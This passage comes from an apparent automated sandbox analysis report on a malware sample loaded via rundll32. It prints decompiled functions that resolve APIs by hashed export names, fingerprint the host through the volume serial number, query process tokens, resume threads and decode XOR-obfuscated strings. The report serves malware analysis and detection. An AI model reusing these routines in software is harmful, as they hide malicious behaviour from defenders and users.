                                                                      				signed int _t99;
                                                                      				signed int _t100;
                                                                      				void* _t102;
                                                                      				void* _t103;
                                                                      
                                                                      				_t95 = __edx;
                                                                      				_t80 = 0;
                                                                      				_v24 = __edx;
                                                                      				_v20 = 0;
                                                                      				_v8 = 0;
                                                                      				_t48 = E041BCE25("endless");
                                                                      				_t96 = _t48;
                                                                      				_v29 = 0;
                                                                      				_t98 = 0xf;
                                                                      				if(_t96 <= _t98) {
                                                                      					__eflags = _t96;
                                                                      					if(_t96 == 0) {
                                                                      						goto L5;
                                                                      					}
                                                                      					goto L3;
                                                                      				} else {
                                                                      					_t96 = _t98;
                                                                      					L3:
                                                                      					_t94 = _t80;
                                                                      					do {
                                                                      						_t5 = _t94 + 0x41; // 0x41
                                                                      						 *((char*)(_t102 + _t94 - 0x28)) = _t5;
                                                                      						_t94 = _t94 + 1;
                                                                      					} while (_t94 < _t96);
                                                                      					L5:
                                                                      					lstrlenW( &_v44);
                                                                      					_t97 = E041BA543( &_v20);
                                                                      					_v28 = _t97;
                                                                      					if(_t97 != 0) {
                                                                      						_t99 = _v20;
                                                                      						_v16 = _t80;
                                                                      						__eflags = _t99;
                                                                      						if(_t99 == 0) {
                                                                      							L27:
                                                                      							E041B913B( &_v28, _t80);
                                                                      							return _v8;
                                                                      						} else {
                                                                      							goto L11;
                                                                      						}
                                                                      						while(1) {
                                                                      							L11:
                                                                      							__eflags = _v8 - _t80;
                                                                      							if(_v8 != _t80) {
                                                                      								break;
                                                                      							}
                                                                      							_t100 = _v8;
                                                                      							_v12 = 1;
                                                                      							do {
                                                                      								__eflags = _t100;
                                                                      								if(_t100 != 0) {
                                                                      									break;
                                                                      								}
                                                                      								E041B92A2( &_v44, _t80, 0x10);
                                                                      								_t60 =  *0x41d0fd8; // 0x439fc50
                                                                      								_t103 = _t103 + 0xc;
                                                                      								__eflags =  *(_t60 + 0x1898) & 0x00000200;
                                                                      								if(__eflags != 0) {
                                                                      									E041BE15A(_t80, _t95, __eflags);
                                                                      								}
                                                                      								_t95 =  &_v44;
                                                                      								_t62 = E041BCA94( *((intOrPtr*)(_t97 + _v16 * 4)),  &_v44); // executed
                                                                      								__eflags = _t62;
                                                                      								if(_t62 >= 0) {
                                                                      									_t95 =  &_v44;
                                                                      									_t71 = E041BA823(0x41b13b8,  &_v44, _v24, _v12); // executed
                                                                      									__eflags = _t71;
                                                                      									if(__eflags != 0) {
                                                                      										_t72 = E041BA952( &_v44, __eflags); // executed
                                                                      										__eflags = _t72;
                                                                      										if(_t72 != 0) {
                                                                      											_t100 = 1;
                                                                      											__eflags = 1;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								__eflags = _v44 - _t80;
                                                                      								if(_v44 != _t80) {
                                                                      									__eflags = _t100;
                                                                      									if(_t100 == 0) {
                                                                      										_t69 =  *0x41d0fa0; // 0x439f8a0
                                                                      										 *((intOrPtr*)(_t69 + 0x114))(_v44, _t80);
                                                                      									}
                                                                      									_t65 =  *0x41d0fa0; // 0x439f8a0
                                                                      									 *((intOrPtr*)(_t65 + 0x34))(_v40);
                                                                      									_t67 =  *0x41d0fa0; // 0x439f8a0
                                                                      									 *((intOrPtr*)(_t67 + 0x34))(_v44);
                                                                      								}
                                                                      								_t64 = _v12 + 1;
                                                                      								_v12 = _t64;
                                                                      								__eflags = _t64 - 2;
                                                                      							} while (_t64 <= 2);
                                                                      							_t57 = _v16 + 1;
                                                                      							_v8 = _t100;
                                                                      							_t99 = _v20;
                                                                      							_v16 = _t57;
                                                                      							__eflags = _t57 - _t99;
                                                                      							if(_t57 < _t99) {
                                                                      								continue;
                                                                      							} else {
                                                                      								break;
                                                                      							}
                                                                      							do {
                                                                      								goto L26;
                                                                      							} while (_t99 != 0);
                                                                      							goto L27;
                                                                      						}
                                                                      						L26:
                                                                      						E041B913B(_t97, 0xfffffffe);
                                                                      						_t97 = _t97 + 4;
                                                                      						_t99 = _t99 - 1;
                                                                      						__eflags = _t99;
                                                                      					}
                                                                      					_t74 = E041BCE25("appear");
                                                                      					_v29 = _t80;
                                                                      					if(_t74 > _t98) {
                                                                      						do {
                                                                      							L8:
                                                                      							_t12 = _t80 + 0x41; // 0x41
                                                                      							 *((char*)(_t102 + _t80 - 0x28)) = _t12;
                                                                      							_t80 = _t80 + 1;
                                                                      						} while (_t80 < _t98);
                                                                      						L9:
                                                                      						lstrlenW( &_v44);
                                                                      						return 0;
                                                                      					}
                                                                      					_t98 = _t74;
                                                                      					if(_t98 == 0) {
                                                                      						goto L9;
                                                                      					}
                                                                      					goto L8;
                                                                      				}
                                                                      			}

































                                                                      0x041ba776
                                                                      0x041ba77b
                                                                      0x041ba77d
                                                                      0x041ba781
                                                                      0x041ba781
                                                                      0x041ba781
                                                                      0x041ba77d
                                                                      0x041ba771
                                                                      0x041ba782
                                                                      0x041ba785
                                                                      0x041ba787
                                                                      0x041ba789
                                                                      0x041ba78b
                                                                      0x041ba794
                                                                      0x041ba794
                                                                      0x041ba79a
                                                                      0x041ba7a2
                                                                      0x041ba7a5
                                                                      0x041ba7ad
                                                                      0x041ba7ad
                                                                      0x041ba7b3
                                                                      0x041ba7b4
                                                                      0x041ba7b7
                                                                      0x041ba7b7
                                                                      0x041ba7c3
                                                                      0x041ba7c4
                                                                      0x041ba7c7
                                                                      0x041ba7ca
                                                                      0x041ba7cd
                                                                      0x041ba7cf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x041ba7d5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x041ba7d5
                                                                      0x041ba7d5
                                                                      0x041ba7d8
                                                                      0x041ba7de
                                                                      0x041ba7e2
                                                                      0x041ba7e2
                                                                      0x041ba7e2
                                                                      0x041ba6c5
                                                                      0x041ba6ca
                                                                      0x041ba6d0
                                                                      0x041ba6d8
                                                                      0x041ba6d8
                                                                      0x041ba6d8
                                                                      0x041ba6db
                                                                      0x041ba6df
                                                                      0x041ba6e0
                                                                      0x041ba6e4
                                                                      0x041ba6e8
                                                                      0x00000000
                                                                      0x041ba6ee
                                                                      0x041ba6d2
                                                                      0x041ba6d6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x041ba6d6

                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,?,00000001,00000000), ref: 041BA6A9
                                                                      • lstrlenW.KERNEL32(?,?,00000001,00000000), ref: 041BA6E8
                                                                        • Part of subcall function 041B92A2: memset.MSVCRT ref: 041B92B4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$memset
                                                                      • String ID: appear$endless
                                                                      • API String ID: 3887242890-2536025861
                                                                      • Opcode ID: 42e5fba076c7827de525e1b4c9e8642536cdc67f506d4038097897d84a8ffffd
                                                                      • Instruction ID: 80a2d7d036165bc14b48850e6024513d9fddfdb52f016c1b5dbb7aafe23130f4
                                                                      • Opcode Fuzzy Hash: 42e5fba076c7827de525e1b4c9e8642536cdc67f506d4038097897d84a8ffffd
                                                                      • Instruction Fuzzy Hash: 6341D072D052199FDB11DFA4C9C49EDBBB5EF487A4F2400A9D881B7240EB31AD81CBE0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 257 41b92f0-41b9307 258 41b9309-41b9331 257->258 259 41b9364 257->259 258->259 261 41b9333-41b9356 call 41bce25 call 41be605 258->261 260 41b9366-41b936a 259->260 266 41b936b-41b9382 261->266 267 41b9358-41b9362 261->267 268 41b93d8-41b93da 266->268 269 41b9384-41b938c 266->269 267->259 267->261 268->260 269->268 270 41b938e 269->270 271 41b9390-41b9396 270->271 272 41b9398-41b939a 271->272 273 41b93a6-41b93b7 271->273 272->273 274 41b939c-41b93a4 272->274 275 41b93b9-41b93ba 273->275 276 41b93bc-41b93c8 LoadLibraryA 273->276 274->271 274->273 275->276 276->259 277 41b93ca-41b93d4 GetProcAddress 276->277 277->259 278 41b93d6 277->278 278->260
                                                                      C-Code - Quality: 100%
                                                                      			E041B92F0(void* __ecx, intOrPtr __edx) {
                                                                      				signed int _v8;
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr _v16;
                                                                      				intOrPtr _v20;
                                                                      				intOrPtr _v24;
                                                                      				intOrPtr _v28;
                                                                      				char _v92;
                                                                      				intOrPtr _t41;
                                                                      				signed int _t47;
                                                                      				signed int _t49;
                                                                      				signed int _t51;
                                                                      				void* _t56;
                                                                      				struct HINSTANCE__* _t58;
                                                                      				_Unknown_base(*)()* _t59;
                                                                      				intOrPtr _t60;
                                                                      				void* _t62;
                                                                      				intOrPtr _t63;
                                                                      				void* _t69;
                                                                      				char _t70;
                                                                      				void* _t75;
                                                                      				CHAR* _t80;
                                                                      				void* _t82;
                                                                      
                                                                      				_t75 = __ecx;
                                                                      				_v12 = __edx;
                                                                      				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                      				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                                                                      				if(_t41 == 0) {
                                                                      					L4:
                                                                      					return 0;
                                                                      				}
                                                                      				_t62 = _t41 + __ecx;
                                                                      				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                                                                      				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                      				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                                                                      				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                                                                      				_t47 = 0;
                                                                      				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                      				_v8 = 0;
                                                                      				_v16 = _t63;
                                                                      				if(_t63 == 0) {
                                                                      					goto L4;
                                                                      				} else {
                                                                      					goto L2;
                                                                      				}
                                                                      				while(1) {
                                                                      					L2:
                                                                      					_t49 = E041BE605( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E041BCE25( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                                                      					_t51 = _v8;
                                                                      					if((_t49 ^ 0x218fe95b) == _v12) {
                                                                      						break;
                                                                      					}
                                                                      					_t73 = _v20;
                                                                      					_t47 = _t51 + 1;
                                                                      					_v8 = _t47;
                                                                      					if(_t47 < _v16) {
                                                                      						continue;
                                                                      					}
                                                                      					goto L4;
                                                                      				}
                                                                      				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                                                      				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                                                      				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                                                                      					return _t80;
                                                                      				} else {
                                                                      					_t56 = 0;
                                                                      					while(1) {
                                                                      						_t70 = _t80[_t56];
                                                                      						if(_t70 == 0x2e || _t70 == 0) {
                                                                      							break;
                                                                      						}
                                                                      						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                                                      						_t56 = _t56 + 1;
                                                                      						if(_t56 < 0x40) {
                                                                      							continue;
                                                                      						}
                                                                      						break;
                                                                      					}
                                                                      					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                                                                      					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                                                                      					if( *((char*)(_t56 + _t80)) != 0) {
                                                                      						_t80 =  &(( &(_t80[1]))[_t56]);
                                                                      					}
                                                                      					_t40 =  &_v92; // 0x6c6c642e
                                                                      					_t58 = LoadLibraryA(_t40); // executed
                                                                      					if(_t58 == 0) {
                                                                      						goto L4;
                                                                      					}
                                                                      					_t59 = GetProcAddress(_t58, _t80);
                                                                      					if(_t59 == 0) {
                                                                      						goto L4;
                                                                      					}
                                                                      					return _t59;
                                                                      				}
                                                                      			}


























                                                                      APIs
                                                                      • LoadLibraryA.KERNELBASE(.dll,?,00000144,00000000), ref: 041B93C0
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 041B93CC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: .dll
                                                                      • API String ID: 2574300362-2738580789
                                                                      • Opcode ID: 418206f944297c360b7a8b229065ce2ceca40d8f68a4924a1485c4a7ca8a15e0
                                                                      • Instruction ID: 389e2674e0535004fad008e0a71f6f30edc32d6c35f19e2d2fad6ce34ce39604
                                                                      • Opcode Fuzzy Hash: 418206f944297c360b7a8b229065ce2ceca40d8f68a4924a1485c4a7ca8a15e0
                                                                      • Instruction Fuzzy Hash: F031C0B1A143159BCB24CF79CAC46EEBBF9AF44304F2804A9D981D72A1D730E982C7D0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%


                                                                      C-Code - Quality: 94%
                                                                      			E041BD04D(WCHAR* __ecx, WCHAR* __edx, void* __eflags) {
                                                                      				long _v8;
                                                                      				long _v12;
                                                                      				WCHAR* _v16;
                                                                      				char _v528;
                                                                      				short _v1040;
                                                                      				short _v1552;
                                                                      				intOrPtr _t23;
                                                                      				WCHAR* _t26;
                                                                      				signed int _t28;
                                                                      				void* _t32;
                                                                      				long _t37;
                                                                      				WCHAR* _t42;
                                                                      				WCHAR* _t57;
                                                                      				void* _t60;
                                                                      
                                                                      				_v8 = _v8 & 0x00000000;
                                                                      				_t42 = __edx;
                                                                      				_t57 = __ecx;
                                                                      				E041B92A2(__edx, 0, 0x100);
                                                                      				_v12 = 0x100;
                                                                      				_t23 =  *0x41d0fa0; // 0x439f8a0
                                                                      				 *((intOrPtr*)(_t23 + 0xc0))( &_v12);
                                                                      				E041BC145(__edx,  &_v528, 0x100);
                                                                      				 *((intOrPtr*)(_t60 + 0xc)) = 0x331;
                                                                      				_t26 = E041B90EA(__edx,  &_v528);
                                                                      				_v16 = _t26;
                                                                      				_t28 = GetVolumeInformationW(_t26,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                                                                      				asm("sbb eax, eax");
                                                                      				_v8 = _v8 &  ~_t28;
                                                                      				E041B9D66( &_v16);
                                                                      				_t32 = E041BCE3E(_t42);
                                                                      				E041BC08E( &(_t42[E041BCE3E(_t42)]), 0x100 - _t32, L"%u", _v8);
                                                                      				lstrcatW(_t42, _t57);
                                                                      				_t37 = E041BCE3E(_t42);
                                                                      				_v12 = _t37;
                                                                      				CharUpperBuffW(_t42, _t37);
                                                                      				return E041BE605(_t42, E041BCE3E(_t42) + _t39, 0);
                                                                      			}


















                                                                      APIs
                                                                        • Part of subcall function 041B92A2: memset.MSVCRT ref: 041B92B4
                                                                      • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 041BD0C7
                                                                        • Part of subcall function 041BC08E: _vsnwprintf.MSVCRT ref: 041BC0AB
                                                                      • lstrcatW.KERNEL32(?,00000114), ref: 041BD100
                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 041BD112
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatmemset
                                                                      • String ID:
                                                                      • API String ID: 3467380347-0
                                                                      • Opcode ID: 34d1d9af1a7656626a48eadab97d66dd587daa71ffd6da2fc542b01a229422ec
                                                                      • Instruction ID: 649343a4ec5c9841052a30ad9476829971fe0fd6f48c996c98a7106fe2029ee2
                                                                      • Opcode Fuzzy Hash: 34d1d9af1a7656626a48eadab97d66dd587daa71ffd6da2fc542b01a229422ec
                                                                      • Instruction Fuzzy Hash: D92165B2A01214AFE714ABA5DCC9FEE7BBCEF84204F104169E545D3140EB746E448BE0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 321 41bdbaf-41bdbcf GetTokenInformation 322 41bdbd1-41bdbda GetLastError 321->322 323 41bdc15 321->323 322->323 324 41bdbdc-41bdbec call 41b911f 322->324 325 41bdc17-41bdc1b 323->325 328 41bdbee-41bdbf0 324->328 329 41bdbf2-41bdc05 GetTokenInformation 324->329 328->325 329->323 330 41bdc07-41bdc13 call 41b913b 329->330 330->328
                                                                      C-Code - Quality: 86%
                                                                      			E041BDBAF(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                                                      				long _v8;
                                                                      				void* _v12;
                                                                      				void* _t12;
                                                                      				void* _t20;
                                                                      				void* _t22;
                                                                      				union _TOKEN_INFORMATION_CLASS _t28;
                                                                      				void* _t31;
                                                                      
                                                                      				_push(_t22);
                                                                      				_push(_t22);
                                                                      				_t31 = 0;
                                                                      				_t28 = __edx;
                                                                      				_t20 = _t22;
                                                                      				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                                                      					L6:
                                                                      					_t12 = _t31;
                                                                      				} else {
                                                                      					_t31 = E041B911F(_v8);
                                                                      					_v12 = _t31;
                                                                      					if(_t31 != 0) {
                                                                      						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                                                      							goto L6;
                                                                      						} else {
                                                                      							E041B913B( &_v12, _t16);
                                                                      							goto L3;
                                                                      						}
                                                                      					} else {
                                                                      						L3:
                                                                      						_t12 = 0;
                                                                      					}
                                                                      				}
                                                                      				return _t12;
                                                                      			}











                                                                      APIs
                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,041B0000,00000000,00000000,?,041BDC30,00000000,00000000,?,041BDC59), ref: 041BDBCA
                                                                      • GetLastError.KERNEL32(?,041BDC30,00000000,00000000,?,041BDC59,00001644,?,041BBBDE), ref: 041BDBD1
                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,041BDC30,00000000,00000000,?,041BDC59,00001644,?,041BBBDE), ref: 041BDC00
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: InformationToken$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2567405617-0
                                                                      • Opcode ID: e5134511b6ec91cd16069cbd0e72af641e4aeab923dc4fac411a1f62f97cd1e0
                                                                      • Instruction ID: d0b70affb64918f9947f9956874c31f4ca09cf306f5d2f6ea4e1fb2c20d19708
                                                                      • Opcode Fuzzy Hash: e5134511b6ec91cd16069cbd0e72af641e4aeab923dc4fac411a1f62f97cd1e0
                                                                      • Instruction Fuzzy Hash: F901F2B2711124BF8B299AA6EDC8DDB7FBCDF496A4B200469F642D2100E770ED4087E0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 333 41ba952-41ba98b call 41bbfab 337 41ba98d-41ba9b1 GetLastError ResumeThread 333->337 338 41ba9c2-41ba9c6 333->338 340 41ba9b3-41ba9b5 337->340 341 41ba9b6-41ba9c0 FindCloseChangeNotification 337->341 340->341 341->338
                                                                      C-Code - Quality: 86%
                                                                      			E041BA952(void* __ecx, void* __eflags) {
                                                                      				char _v44;
                                                                      				intOrPtr _t9;
                                                                      				intOrPtr _t12;
                                                                      				void* _t13;
                                                                      				intOrPtr _t17;
                                                                      				void* _t20;
                                                                      				void* _t21;
                                                                      				void* _t28;
                                                                      				void* _t29;
                                                                      				void* _t31;
                                                                      				void* _t32;
                                                                      
                                                                      				_t9 =  *0x41d0fd8; // 0x439fc50
                                                                      				_t1 = _t9 + 0xac; // 0x68711f3a
                                                                      				_t21 = __ecx;
                                                                      				E041BBFAB( &_v44,  *_t1 + 7, __eflags);
                                                                      				_t32 = 0;
                                                                      				_t12 =  *0x41d0fa0; // 0x439f8a0
                                                                      				_t13 =  *((intOrPtr*)(_t12 + 0xd4))(0, 0, 0,  &_v44, _t28, _t31, _t20);
                                                                      				_t29 = _t13;
                                                                      				if(_t29 != 0) {
                                                                      					GetLastError();
                                                                      					ResumeThread( *(_t21 + 4));
                                                                      					_t17 =  *0x41d0fa0; // 0x439f8a0
                                                                      					_push(0x2710);
                                                                      					_push(_t29);
                                                                      					if( *((intOrPtr*)(_t17 + 0x30))() == 0) {
                                                                      						_t32 = 1;
                                                                      					}
                                                                      					FindCloseChangeNotification(_t29);
                                                                      					_t13 = _t32;
                                                                      				}
                                                                      				return _t13;
                                                                      			}















                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,041B4C08), ref: 041BA98D
                                                                      • ResumeThread.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,041B4C08), ref: 041BA99B
                                                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,041B4C08), ref: 041BA9BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeCloseErrorFindLastNotificationResumeThread
                                                                      • String ID:
                                                                      • API String ID: 4135917582-0
                                                                      • Opcode ID: 51acd420ff868960a5b265aaa4232ff5b3150bc9b1bb70ad5cf333ffc2f0086e
                                                                      • Instruction ID: 886e165a60462729ce582a34e52791a909e72102c2d20a8ced63bbae441a0593
                                                                      • Opcode Fuzzy Hash: 51acd420ff868960a5b265aaa4232ff5b3150bc9b1bb70ad5cf333ffc2f0086e
                                                                      • Instruction Fuzzy Hash: 37014F722021109FC7059B99E888EAF7FB8EF4D695F554068F645D7205D734AC81CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 360 41b9c9b-41b9cb0 361 41b9cb2-41b9cc3 360->361 362 41b9cd6-41b9cf4 GetNumberFormatA 360->362 363 41b9ccf-41b9cd4 361->363 364 41b9cc5-41b9cc8 361->364 365 41b9d00 362->365 366 41b9cf6 362->366 363->362 364->361 367 41b9cca-41b9ccd 364->367 369 41b9d02-41b9d06 365->369 368 41b9cf8-41b9cfc 366->368 367->362 368->368 370 41b9cfe 368->370 369->369 371 41b9d08-41b9d1a call 41b911f 369->371 370->371 374 41b9d1c-41b9d21 371->374 375 41b9d23-41b9d25 371->375 376 41b9d47-41b9d4b 374->376 377 41b9d27-41b9d43 375->377 378 41b9d45 375->378 377->377 377->378 378->376
                                                                      C-Code - Quality: 100%
                                                                      			E041B9C9B(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
                                                                      				intOrPtr _v8;
                                                                      				char _v88;
                                                                      				int _t19;
                                                                      				struct _numberfmt* _t29;
                                                                      				signed int _t33;
                                                                      				signed int _t34;
                                                                      				struct _numberfmt* _t36;
                                                                      				void* _t38;
                                                                      				void* _t41;
                                                                      				struct _numberfmt* _t44;
                                                                      				signed int _t45;
                                                                      
                                                                      				_t41 = __edx;
                                                                      				_t45 = _a12;
                                                                      				_t44 = 0;
                                                                      				_v8 = __ecx;
                                                                      				_t33 = 0;
                                                                      				if(_t45 >= __edx) {
                                                                      					L5:
                                                                      					_t19 = GetNumberFormatA(0x7d3, 0xb4, "electricmadness", _t44,  &_v88, 0x22); // executed
                                                                      					if(_t19 != 0) {
                                                                      						_t36 = _t44;
                                                                      						do {
                                                                      							_t36 = _t36 + 1;
                                                                      						} while (_t36 < 0x22);
                                                                      						L11:
                                                                      						_t38 = E041B911F(2 + _t33 * 2);
                                                                      						if(_t38 != 0) {
                                                                      							if(_t33 == 0) {
                                                                      								L15:
                                                                      								return _t38;
                                                                      							} else {
                                                                      								goto L14;
                                                                      							}
                                                                      							do {
                                                                      								L14:
                                                                      								 *((short*)(_t38 + _t44 * 2)) = ( *((_t45 & 0x0000007f) + _a4) ^  *(_t45 + _v8)) & 0x000000ff;
                                                                      								_t44 = _t44 + 1;
                                                                      								_t45 = _t45 + 1;
                                                                      							} while (_t44 < _t33);
                                                                      							goto L15;
                                                                      						}
                                                                      						return 0x41d10a8;
                                                                      					}
                                                                      					_t29 = _t44;
                                                                      					do {
                                                                      						_t29 = _t29 + 1;
                                                                      					} while (_t29 < 0x14);
                                                                      					goto L11;
                                                                      				}
                                                                      				while( *((_t45 & 0x0000007f) + _a4) !=  *(_t45 + _v8)) {
                                                                      					_t45 = _t45 + 1;
                                                                      					if(_t45 < _t41) {
                                                                      						continue;
                                                                      					}
                                                                      					_t45 = _a12;
                                                                      					goto L5;
                                                                      				}
                                                                      				_t34 = _t45;
                                                                      				_t45 = _a12;
                                                                      				_t33 = _t34 - _t45;
                                                                      				goto L5;
                                                                      			}















                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: FormatNumber
                                                                      • String ID: electricmadness
                                                                      • API String ID: 481257995-1127315026
                                                                      • Opcode ID: 885ecfdb4fd67d3981d57ac72f43e4455aa722d82b748c8aeb6167a8d5b9e8ad
                                                                      • Instruction ID: 021f1cc95d472873883171b07edc2758d7a0fc3b7311ca6e934bb4f214898218
                                                                      • Opcode Fuzzy Hash: 885ecfdb4fd67d3981d57ac72f43e4455aa722d82b748c8aeb6167a8d5b9e8ad
                                                                      • Instruction Fuzzy Hash: BA1159B27243586BDB059F5998D16FA77AAAF89210B1404A9EBD2EB351D770FC03C3C0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

